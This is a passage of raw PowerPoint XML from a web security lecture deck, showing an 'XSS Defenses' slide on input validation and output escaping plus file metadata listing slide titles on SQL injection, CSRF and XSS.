                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="196826315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2304D1-A4FF-CD4C-B5AA-38B94770BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>XSS Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD665A0D-3A60-0C46-B420-B25C7FF87279}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input Validation                               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>check that inputs are of expected  form (whitelisting instead of blacklisting);</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Output Escaping                           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>escape dynamic data before  inserting it into HTML</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2140308026"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="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Verdana"/>
        <a:ea typeface="宋体"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Verdana"/>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24437</TotalTime>
  <Words>4134</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>842</Paragraphs>
  <Slides>106</Slides>
  <Notes>10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106</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="115" baseType="lpstr">
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>默认设计模板</vt:lpstr>
      <vt:lpstr>Web Security</vt:lpstr>
      <vt:lpstr>Web?</vt:lpstr>
      <vt:lpstr>Web Browser</vt:lpstr>
      <vt:lpstr>Web Service</vt:lpstr>
      <vt:lpstr>Web Service</vt:lpstr>
      <vt:lpstr>URL</vt:lpstr>
      <vt:lpstr>URL</vt:lpstr>
      <vt:lpstr>HTTP</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Request</vt:lpstr>
      <vt:lpstr>HTTP Response</vt:lpstr>
      <vt:lpstr>Webpage Languages</vt:lpstr>
      <vt:lpstr>HTML</vt:lpstr>
      <vt:lpstr>CSS</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>Page Rendering</vt:lpstr>
      <vt:lpstr>Frame</vt:lpstr>
      <vt:lpstr>Frame</vt:lpstr>
      <vt:lpstr>Frame</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Web Security Goals</vt:lpstr>
      <vt:lpstr>Web Security Goals</vt:lpstr>
      <vt:lpstr>Web Security Goals</vt:lpstr>
      <vt:lpstr>Web Security Goals</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Compromised Server</vt:lpstr>
      <vt:lpstr>Injection Attack</vt:lpstr>
      <vt:lpstr>Structure of Web Service</vt:lpstr>
      <vt:lpstr>Structure of Web Service</vt:lpstr>
      <vt:lpstr>Structure of Web Service</vt:lpstr>
      <vt:lpstr>Structure of Web Service</vt:lpstr>
      <vt:lpstr>Database</vt:lpstr>
      <vt:lpstr>Database</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Input Sanitization</vt:lpstr>
      <vt:lpstr>Input Escaping</vt:lpstr>
      <vt:lpstr>Input Escaping</vt:lpstr>
      <vt:lpstr>Input Escaping</vt:lpstr>
      <vt:lpstr>Prepared Statement</vt:lpstr>
      <vt:lpstr>Prepared Statement</vt:lpstr>
      <vt:lpstr>Prepared Statement</vt:lpstr>
      <vt:lpstr>Prepared Statement</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>Same-Origin Policy</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>Cookie</vt:lpstr>
      <vt:lpstr>Cookie</vt:lpstr>
      <vt:lpstr>Cookie</vt:lpstr>
      <vt:lpstr>Session Token</vt:lpstr>
      <vt:lpstr>HTTP Session</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>CSRF Defenses</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>XSS Attack</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Stored XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>Reflected XSS</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>XSS Defenses</vt:lpstr>
      <vt:lpstr>?</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Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>1561</cp:revision>
  <cp:lastPrinted>1601-01-01T00:00:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1601-01-01T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-15T07:43:46Z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1</vt:i4>
  </property>
</Properties>
</file>